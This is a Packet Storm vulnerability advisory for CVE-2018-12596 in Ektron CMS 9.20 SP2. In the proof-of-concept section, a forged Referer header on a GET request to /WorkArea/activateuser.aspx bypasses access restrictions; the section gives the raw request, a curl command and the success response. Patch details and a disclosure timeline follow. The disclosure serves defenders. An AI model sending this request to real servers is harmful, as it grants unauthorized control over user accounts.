exploit the possibilities

Ektron CMS 9.20 SP2 Improper Access Restrictions

Ektron CMS 9.20 SP2 Improper Access Restrictions
Posted Oct 10, 2018
Authored by Alt3kx

Ektron CMS version 9.20 SP2 suffers from an improper access restriction vulnerability.

tags | exploit
advisories | CVE-2018-12596
MD5 | ca4ad2f1e7feda0dfa0819e60cce4e6b

Ektron CMS 9.20 SP2 Improper Access Restrictions

Change Mirror Download
Details
================
Software: Ektron Content Management System (CMS)
Version: 9.20 SP2
Homepage: https://www.episerver.com
Advisory report: https://github.com/alt3kx/CVE-2018-12596
CVE: CVE-2018-12596
CVSS: 7.5 (HIGH: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CWE-284

Description
================
Ektron CMS 9.20 SP2 allows remote attackers to enable users.

Vulnerability
================
Ektron CMS 9.20 SP2 allows remote attackers to call aspx pages via the "activateuser.aspx" page, even if a page
is located under the /WorkArea/ path, which is forbidden (normally available exclusively for local admins).

Proof of concept Exploit
========================

Pre-requisites:

- curl command deployed (Windows or Linux)
- Burpsuite Free/Pro deployed or any other WebProxy to catch/send GET request

Step (1): Launch the BurpSuite with default paramenter then request the follwing URL:

Target: https://ektronserver.com/WorkArea/activateuser.aspx

Normally you will see a 403 Forbidden: Access denied.

Step (2): Into BurpSuite Free/Pro add the following extra Header Referer:

"Referer: ALEX;"

Step (3): The offending GET request is:

GET /WorkArea/activateuser.aspx HTTP/1.1
Host: ektronserver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Referer: ALEX;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Step (4): Test your GET request using curl command and burpsuite as following:

# curl -i -s -k -XGET "https://ektronserver.com/WorkArea/activateuser.aspx"
-H "Host: ektronserver.com"
-H "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
-H "Referer: ALEX;"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate"
-H "Connection: close"
--proxy http://127.0.0.1:8080

You should see now the following response 200 OK!:

HTTP/1.0 200 Connection established

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8

Now you got access to enable users, just send the repeat request into the browser using burpsuite

Have fun!

Mitigations
================
Install the latest patches available here:

PATCH ID: EKTR-508: Security enhancement for re-enabling a user
https://support.episerver.com/hc/en-us/articles/115002828112-9-2-SP2-Site-Update

Any of the below should fix CVE-2018-12596

9.3(main release)
9.2 SP2 Site CU 22
9.1 SP3 Site CU 45
9.0 SP3 Site CU 31

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================
2018a06a08: Discovered
2018a06a11: Retest staging environment
2018a06a12: Restes live environment
2018a06a19: Internal communication
2018a06a21: Vendor notification
2018a06a21: Vendor feedback
2018a06a29: Vendor feedback product will be patched
2018a06a29: Patch available
2018a06a29: Agrements with the vendor to publish the CVE/Advisory.
2018a07a30: Internal communication
2018a09a15: Patches tested on LAB environment.
2018a10a08: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db: https://www.exploit-db.com/author/?a=1074


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close